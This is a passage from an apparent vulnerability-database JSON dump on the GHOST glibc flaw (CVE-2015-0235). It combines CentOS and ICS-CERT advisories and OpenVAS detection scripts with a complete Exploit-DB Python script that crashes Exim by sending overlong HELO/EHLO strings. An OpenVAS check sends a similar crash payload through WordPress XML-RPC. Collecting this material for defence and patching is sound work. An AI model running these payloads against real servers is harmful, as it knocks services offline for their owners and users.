"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36421/"}, {"lastseen": "2016-02-04T02:21:25", "bulletinFamily": "exploit", "description": "Exim ESMTP 4.80 glibc gethostbyname - Denial of Service. CVE-2015-0235. Dos exploit for linux platform", "modified": "2015-01-29T00:00:00", "published": "2015-01-29T00:00:00", "id": "EDB-ID:35951", "href": "https://www.exploit-db.com/exploits/35951/", "type": "exploitdb", "title": "Exim ESMTP 4.80 glibc gethostbyname - Denial of Service", "sourceData": "# Exploit Title: [Exim ESMTP GHOST DoS PoC Exploit]\r\n# Date: [1/29/2015]\r\n# Exploit Author: [1N3]\r\n# Vendor Homepage: [www.exim.org]\r\n# Version: [4.80 or less]\r\n# Tested on: [debian-7-7-64b]\r\n# CVE : [2015-0235]\r\n\r\n#!/usr/bin/python\r\n# Exim ESMTP DoS Exploit by 1N3 v20150128\r\n# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow\r\n# http://crowdshield.com\r\n#\r\n# USAGE: python ghost-smtp-dos.py <ip> <port>\r\n#\r\n# Escape character is '^]'.\r\n# 220 debian-7-7-64b ESMTP Exim 4.80 ...\r\n# HELO\r\n# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n# Connection closed by foreign host.\r\n#\r\n# user () debian-7-7-64b:~$ dmesg\r\n# ...\r\n# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in\r\n# libc-2.13.so[7fabef2a2000+182000]\r\n\r\nimport socket\r\nimport time\r\nimport sys, getopt\r\n\r\ndef main(argv):\r\n argc = len(argv)\r\n\r\n if argc <= 1:\r\n print \"usage: %s <host>\" % (argv[0])\r\n sys.exit(0)\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n buffer = \"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\r\n target = argv[1] # SET TARGET\r\n port = argv[2] # SET PORT\r\n\r\n print \"(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com\"\r\n print \"(--==== Sending GHOST SMTP DoS to \" + target + \":\" + port + \" with length:\" +str(len(buffer))\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect=s.connect((target,int(port)))\r\n data = s.recv(1024)\r\n print \"CONNECTION: \" +data\r\n s.send('HELO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.send('EHLO ' + buffer + '\\r\\n')\r\n data = s.recv(1024)\r\n print \"received: \" +data\r\n s.close()\r\n\r\nmain(sys.argv) \r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35951/"}], "centos": [{"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0092\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-static\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0092.html", "modified": "2015-01-28T00:30:01", "published": "2015-01-27T23:31:01", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020907.html", "id": "CESA-2015:0092", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:45", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:0090\n\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-January/020906.html\n\n**Affected packages:**\nglibc\nglibc-common\nglibc-devel\nglibc-headers\nglibc-utils\nnscd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0090.html", "modified": "2015-01-27T22:59:55", "published": "2015-01-27T22:59:55", "href": "http://lists.centos.org/pipermail/centos-announce/2015-January/020906.html", "id": "CESA-2015:0090", "title": "glibc, nscd security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2019-07-19T15:42:38", "bulletinFamily": "info", "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the original advisory titled ICSA-15-064-01 Siemens SIMATIC HMI Basic, SINUMERIK, and Ruggedcom APE GHOST Vulnerability that was published March 5, 2015, on the NCCIC/ICS-CERT web site.\n\nThe \u201cGHOST\u201da vulnerability in the glibc library affects the Siemens SINUMERIK and SIMATIC HMI Basic applications. Siemens has produced an update for SINUMERIK that mitigates this vulnerability.\n\n### **\\--------- Begin Update A Part 1 of 2 -------- **\n\nSiemens has released an update for SIMATIC HMI Basic Panels.\n\n### **\\--------- End Update A Part 1 of 2 --------** \n\n\n## AFFECTED PRODUCTS\n\nThe following SINUMERIK and SIMATIC HMI Basic versions are affected:\n\n * SINUMERIK 808D, 828D, 840D sl, all versions up to 4.7, and\n * SIMATIC HMI Basic Panels 2nd Generation.\n\nThe following Ruggedcom APE versions are not vulnerable in their default configuration, but can become exploitable depending on components installed and user configuration:\n\nRuggedcom APE: APE1402-XX, APE1402-C01, APE1404-XX, APE1404-C01, all versions.\n\n## IMPACT\n\nAn authenticated local user could cause a denial of service of the targeted system by exploiting this vulnerability.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected products, SINUMERIK, SIMATIC HMI Basic, and Ruggedcom, are used as an interface between operators and corresponding systems, as well as the ability to run third-party components. These products are deployed across several sectors including: Chemical, Energy, Food and Agriculture, and Water and Wastewater Systems. Siemens estimates that these products are used primarily in the United States and Europe with a small percentage in Asia.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER INPUT VALIDATIONb\n\nIncorrect parsing within the glibc library functions \u201cgethostbyname()\u201d and \u201cgethostbyname2()\u201d could cause a denial of service of the targeted system.\n\nCVE-2015-0235c has been assigned to this vulnerability. A CVSS v2 base score of 4.6 has been assigned; the CVSS vector string is (AV:L/AC:L/Au:S/C:N/I:N/A:C).d\n\n#### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nIn order to exploit the SINUMERIK and SIMATIC HMI Basic products, an attacker would first need to have authenticated local access to the device(s). To exploit the Ruggedcom APE product an attacker would need to be able to influence parameters passed to the vulnerable functions. This is only possible if the user has installed components that utilize the vulnerable functions and that are accessible to the attacker.\n\n#### EXISTENCE OF EXPLOIT\n\nNo known public exploits specifically target these products. However, public exploits for the \u201cGHOST\u201d vulnerability do exist.\n\n#### DIFFICULTY\n\nAn attacker with local access and a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSiemens has released security advisory SSA-994726 at the following location: <http://www.siemens.com/cert/advisories>\n\nSiemens has provided updates for the following products and encourages customers to upgrade the products to the newest version:\n\n * SINUMERIK Controllers \u2013 Contact your local Siemens account manager for the update.\n * For Version V2.7: update to V2.7 SP4 Hotfix 3\n * For Version V4.5: update to V4.5 SP4 Hotfix 4\n * For Version V4.7: update to V4.7 SP1\n * Ruggedcom APE: APE1402-XX, APE1402-C01, APE1404-XX, APE1404-C01, All versions. Upgrade information is available at:\n\n<https://support.industry.siemens.com/cs/#document/109474273?lc=en-WW>\n\n### **\\--------- Begin Update A Part 2 of 2 --------**\n\n * SIMATIC HMI Basic Panels 2nd Generation\n * Siemens has released an update and updated its security advisory SSA-994726. Please see the Siemens advisory for the update details.\n\n### **\\--------- End Update A Part 2 of 2 --------**\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\nMinimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\nIn addition, ICS-CERT recommends that users take the following measures to protect themselves from social engineering attacks:\n\n 1. Do not click web links or open unsolicited attachments in email messages.\n 2. Refer to Recognizing and Avoiding Email Scamse for more information on avoiding email scams.\n 3. Refer to Avoiding Social Engineering and Phishing Attacksf for more information on social engineering attacks.\n * a. Further information about the GHOST vulnerability: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235, web site last accessed March 05, 2015.\n * b. CWE-20: Improper Input Validation, http://cwe.mitre.org/data/definitions/20.html, web site last accessed March 05, 2015.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235, web site last accessed March 05, 2015.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:L/AC:L/Au:S/C:N/I:N/A:C, web site last accessed March 05, 2015.\n * e. Recognizing and Avoiding Email Scams, http://www.us-cert.gov/reading_room/emailscams_0905.pdf, web site last accessed March 05, 2015.\n * f. National Cyber Alert System Cyber Security Tip ST04-014, http://www.us-cert.gov/cas/tips/ST04-014.html, web site last accessed March 05, 2015.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the NCCIC at: \n \nEmail: [NCCICCUSTOMERSERVICE@hq.dhs.gov](<mailto:NCCICCUSTOMERSERVICE@hq.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: http://ics-cert.us-cert.gov \nor incident reporting: https://ics-cert.us-cert.gov/Report-Incident?\n\nThe NCCIC continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "modified": "2018-08-27T00:00:00", "published": "2015-04-23T00:00:00", "id": "ICSA-15-064-01A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-15-064-01A", "title": "Siemens SIMATIC HMI Basic, SINUMERIK, and Ruggedcom APE GHOST Vulnerability (Update A)", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-02-03T00:00:00", "id": "OPENVAS:1361412562310850633", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850633", "title": "SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0184_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850633\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-03 05:45:11 +0100 (Tue, 03 Feb 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for glibc openSUSE-SU-2015:0184-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for glibc fixes the following security issue:\n\n CVE-2015-0235: A vulnerability was found and fixed in the GNU C Library,\n specifically in the function gethostbyname(), that could lead to a local\n or remote buffer overflow. (bsc#913646)\");\n script_tag(name:\"affected\", value:\"glibc on openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:0184_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.17~4.17.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:16", "bulletinFamily": "scanner", "description": "The remote host is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.", "modified": "2019-02-14T00:00:00", "published": "2015-01-31T00:00:00", "id": "OPENVAS:1361412562310105192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105192", "title": "GNU glibc Remote Heap Buffer Overflow Vulnerability (Wordpress)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_ghost_72325.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# GNU glibc Remote Heap Buffer Overflow Vulnerability (Wordpress)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:wordpress:wordpress';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105192\");\n script_bugtraq_id(72325);\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13659 $\");\n\n script_name(\"GNU glibc Remote Heap Buffer Overflow Vulnerability (Wordpress)\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72325\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/libc/\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute arbitrary code in the\ncontext of the affected application. Failed exploit attempts may crash the application, denying service\nto legitimate users.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted XML POST request and check the response\");\n script_tag(name:\"solution\", value:\"Update your glibc and reboot.\");\n script_tag(name:\"summary\", value:\"The remote host is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-31 15:37:56 +0100 (Sat, 31 Jan 2015)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\n\nfunction _test( boom, port, dir, host ) {\n\n local_var soc, len, req, recv, port, dir;\n\n soc = open_sock_tcp( port );\n if( ! soc ) return FALSE;\n\n xml = '<?xml version=\"1.0\"?>\\r\\n' +\n ' <methodCall>\\r\\n' +\n ' <methodName>pingback.ping</methodName>\\r\\n' +\n ' <params><param><value>\\r\\n' +\n ' <string>http://' + boom + '/index.php</string>\\r\\n' +\n ' </value></param>\\r\\n' +\n ' <param><value>\\r\\n' +\n ' <string>http://' + boom + '/index.php</string>\\r\\n' +\n ' </value></param>\\r\\n' +\n ' </params>\\r\\n' +\n ' </methodCall>';\n\n len = strlen( xml );\n useragent = http_get_user_agent();\n req = 'POST ' + dir + '/xmlrpc.php HTTP/1.1\\r\\n' +\n 'Accept: */*\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n '\\r\\n' +\n xml;\n\n send( socket:soc, data: req );\n recv = recv( socket:soc, length:1024);\n\n if( ! recv && socket_get_error( soc ) == ECONNRESET ) recv = 'ECONNRESET';\n\n close( soc );\n\n return recv;\n\n}\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\nif( dir == \"/\" ) dir = \"\";\n\nhost = http_host_name(port:port);\n\nboom = this_host();\nbuf = _test( boom:boom, port:port, dir:dir, host:host );\n\nif( \"methodResponse\" >!< buf ) exit( 0 );\n\nboom = crap( data:\"0\", length:2500 );\nbuf = _test( boom:boom, port:port, dir:dir, host:host );\n\nif( buf == 'ECONNRESET' || \"500 Internal Server Error\" >< buf )\n{\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310871307", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871307", "title": "RedHat Update for glibc RHSA-2015:0092-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2015:0092-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871307\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:35 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for glibc RHSA-2015:0092-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux 